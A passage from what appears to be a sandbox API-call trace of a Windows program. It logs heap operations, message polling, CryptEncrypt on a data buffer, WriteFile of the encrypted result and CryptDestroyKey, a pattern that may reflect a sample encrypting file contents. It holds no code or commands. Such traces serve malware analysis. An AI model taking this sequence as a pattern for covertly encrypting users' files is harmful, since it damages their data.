Size=0x10) returned 0x2aab578 [0221.868] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9c8 [0221.868] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71db8 [0221.868] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782a0 [0221.868] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72028 [0221.868] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0221.868] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a782a0 | out: hHeap=0x2af0000) returned 1 [0221.868] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72028 | out: hHeap=0x2af0000) returned 1 [0221.868] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab8c0 [0221.868] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0221.868] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0221.868] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72028 [0221.868] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a720e8 | out: hHeap=0x2af0000) returned 1 [0221.868] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0221.868] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78200 | out: hHeap=0x2af0000) returned 1 [0221.868] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72088 | out: hHeap=0x2af0000) returned 1 [0221.868] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9b0 | out: hHeap=0x2af0000) returned 1 [0221.868] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab848 | out: hHeap=0x2af0000) returned 1 [0221.868] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab950 | out: hHeap=0x2af0000) returned 1 [0221.869] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71fe8 | out: hHeap=0x2af0000) returned 1 [0221.869] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72028 | out: hHeap=0x2af0000) returned 1 [0221.869] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0221.869] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e840 | out: hHeap=0x2af0000) returned 1 [0221.869] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0221.869] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72088 | out: hHeap=0x2af0000) returned 1 [0221.869] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab938 | out: hHeap=0x2af0000) returned 1 [0221.869] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab860 | out: hHeap=0x2af0000) returned 1 [0221.869] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab788 | out: hHeap=0x2af0000) returned 1 [0221.869] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72028 | out: hHeap=0x2af0000) returned 1 [0221.869] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71fe8 | out: hHeap=0x2af0000) returned 1 [0221.869] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0221.869] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8c0 | out: hHeap=0x2af0000) returned 1 [0221.869] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71db8 | out: hHeap=0x2af0000) returned 1 [0221.869] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71db8 | out: hHeap=0x2af0000) returned 1 [0221.869] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71db8 | out: hHeap=0x2af0000) returned 1 [0221.869] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71db8 | out: hHeap=0x2af0000) returned 1 [0221.869] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0221.869] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71db8 | out: hHeap=0x2af0000) returned 1 [0221.869] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71db8 | out: hHeap=0x2af0000) returned 1 [0221.869] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a720d8 | out: hHeap=0x2af0000) returned 1 [0221.869] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab740 | out: hHeap=0x2af0000) returned 1 [0221.869] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab920 | out: hHeap=0x2af0000) returned 1 [0221.869] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab848 | out: hHeap=0x2af0000) returned 1 [0221.869] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71db8 | out: hHeap=0x2af0000) returned 1 [0221.869] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71db8 | out: hHeap=0x2af0000) returned 1 [0221.870] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78098 | out: hHeap=0x2af0000) returned 1 [0221.870] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71db8 | out: hHeap=0x2af0000) returned 1 [0221.870] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71db8 | out: hHeap=0x2af0000) returned 1 [0221.870] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71fe8 | out: hHeap=0x2af0000) returned 1 [0221.870] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab7b8 | out: hHeap=0x2af0000) returned 1 [0221.870] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab7a0 | out: hHeap=0x2af0000) returned 1 [0221.870] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab788 | out: hHeap=0x2af0000) returned 1 [0221.870] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71db8 | out: hHeap=0x2af0000) returned 1 [0221.870] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71db8 | out: hHeap=0x2af0000) returned 1 [0221.870] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72088 | out: hHeap=0x2af0000) returned 1 [0221.870] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabc80 | out: hHeap=0x2af0000) returned 1 [0221.870] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab860 | out: hHeap=0x2af0000) returned 1 [0221.870] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab908 | out: hHeap=0x2af0000) returned 1 [0221.870] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71db8 | out: hHeap=0x2af0000) returned 1 [0221.870] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71db8 | out: hHeap=0x2af0000) returned 1 [0221.871] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72098 | out: hHeap=0x2af0000) returned 1 [0221.871] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a97140 | out: hHeap=0x2af0000) returned 1 [0221.871] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a720d8 | out: hHeap=0x2af0000) returned 1 [0221.871] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabb60 | out: hHeap=0x2af0000) returned 1 [0221.871] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabc08 | out: hHeap=0x2af0000) returned 1 [0221.871] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71db8 | out: hHeap=0x2af0000) returned 1 [0221.871] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71db8 | out: hHeap=0x2af0000) returned 1 [0221.871] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0221.871] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71fe8 | out: hHeap=0x2af0000) returned 1 [0221.871] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabc98 | out: hHeap=0x2af0000) returned 1 [0221.871] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabcb0 | out: hHeap=0x2af0000) returned 1 [0221.871] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabb60 | out: hHeap=0x2af0000) returned 1 [0221.871] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71db8 | out: hHeap=0x2af0000) returned 1 [0221.871] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0221.871] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabcb0 | out: hHeap=0x2af0000) returned 1 [0221.871] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71fe8 | out: hHeap=0x2af0000) returned 1 [0221.871] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaba40 | out: hHeap=0x2af0000) returned 1 [0221.871] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72028 | out: hHeap=0x2af0000) returned 1 [0221.871] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaba58 | out: hHeap=0x2af0000) returned 1 [0221.871] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71fe8 | out: hHeap=0x2af0000) returned 1 [0221.871] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabb30 | out: hHeap=0x2af0000) returned 1 [0221.871] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72028 | out: hHeap=0x2af0000) returned 1 [0221.871] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabbf0 | out: hHeap=0x2af0000) returned 1 [0221.871] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72028 | out: hHeap=0x2af0000) returned 1 [0221.871] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabba8 | out: hHeap=0x2af0000) returned 1 [0221.871] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72088 | out: hHeap=0x2af0000) returned 1 [0221.871] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabb00 | out: hHeap=0x2af0000) returned 1 [0221.872] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72028 | out: hHeap=0x2af0000) returned 1 [0221.872] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0221.872] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aabc80, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0221.872] CryptEncrypt (in: hKey=0x9e1bf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0x454e, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0x4550) returned 1 [0221.872] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0221.872] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0221.872] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0221.872] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0221.872] CharLowerBuffW (in: lpsz="byte[17744]", cchLength=0xb | out: lpsz="byte[17744]") returned 0xb [0221.872] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0221.872] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0221.873] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0221.873] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0221.873] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0221.873] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0221.873] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0221.873] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0221.873] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0221.873] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aabad0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0221.873] CryptEncrypt (in: hKey=0x9e1bf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2a97140*, pdwDataLen=0x8cef60*=0x454e, dwBufLen=0x4550 | out: pbData=0x2a97140*, pdwDataLen=0x8cef60*=0x4550) returned 1 [0221.874] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0221.874] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0221.874] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0221.874] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0221.874] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0221.876] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0221.876] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0221.877] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0221.877] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0221.877] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0221.877] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0221.877] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0221.877] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0221.877] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0221.877] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0221.877] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0221.877] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0221.877] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0221.877] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0221.877] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0221.877] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0221.877] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0221.877] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0221.877] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0221.877] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0221.877] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0221.877] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0221.881] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0221.881] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0221.881] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0221.881] WriteFile (in: hFile=0x50c, lpBuffer=0x2a8e690*, nNumberOfBytesToWrite=0x4550, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x2a8e690*, lpNumberOfBytesWritten=0x8cf5e4*=0x4550, lpOverlapped=0x0) returned 1 [0221.882] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0221.882] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0221.882] CharUpperBuffW (in: lpsz="A4D00401A22", cchLength=0xb | out: lpsz="A4D00401A22") returned 0xb [0221.882] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0221.882] CharUpperBuffW (in: lpsz="SSA4D00401A22", cchLength=0xd | out: lpsz="SSA4D00401A22") returned 0xd [0221.882] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0221.882] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0221.882] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0221.882] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0221.882] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0221.883] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0221.883] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0221.883] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0221.883] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0221.883] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2aab7e8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0221.883] CryptDestroyKey (hKey=0x9e1bf8) returned 1 [0221.883] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0221.883] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0221.883] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0221.883] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0221.883] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0221.883] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0221.883] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0221.883] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0221.883] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0221.883] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0221.883] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0221.883] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0221.883] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0221.883] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0221.883] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0221.883] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0221.884] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0221.884] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0221.884] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0221.884] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0221.884] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0221.884] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0221.884] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0221.884] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0221.884] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0221.884] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0221.884] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0221.884] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, 